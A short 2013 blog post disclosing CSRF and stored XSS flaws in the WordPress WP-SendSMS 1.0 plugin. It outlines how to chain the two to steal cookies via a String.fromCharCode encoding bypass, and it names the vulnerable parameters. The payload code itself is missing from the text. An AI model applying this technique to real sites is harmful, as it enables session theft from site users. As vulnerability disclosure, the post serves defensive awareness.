Wednesday, 12 June 2013

Wordpress WP-SendSMS Plugin 1.0 - Multiple Vulnerabilities

Wordpress WP-SendSMS plugin 1.0 suffers from CSRF and Stored XSS vulnerabilities.
Interesting thing is Stored XSS + CSRF combination, because of which, attacker can exploit CSRF vulnerability to Trigger Stored XSS, for stealing Cookies!!!!

So what I have done here is , crafted simple CSRF exploit page with Stored XSS payload as below :


1. Stored XSS was there but was not able to execute functions like document.cookie, alert() etc.
2. Storing XSS payload inside our CSRF exploit html page.

To bypass 1st challenge I had to use function "String.fromCharCode(ascii value)" and payload will look like :


Above payload will redirect victim to my website by attaching cookies in URL!!...

But when we put this payload inside value="XSS PAYLOAD" it will not work because it will be interpreted as value = ""><script>........ which actually sets your value="" instead of XSS payload to bypass this we can put &quot; instead of " ... and this will be considered as valid XSS payload inside your CSRF exploit form.

For exploit please check : exploit-db

Stored XSS Details :


Stored XSS Vulnerable Parameters:
1. sender_id
2. maximum_characters
3. captcha_width
4. captcha_height
4. captcha_characters

Vulnerability POC:

Cookies are redirected to Attackers Website

This is how Stored XSS can be exploited through CSRF which is effective attack, this is just for information purpose.

Published on Exploit-db

1 comment:

  1. Are you sure, you are a security researcher?! You do not even know how to explain a simple flaw!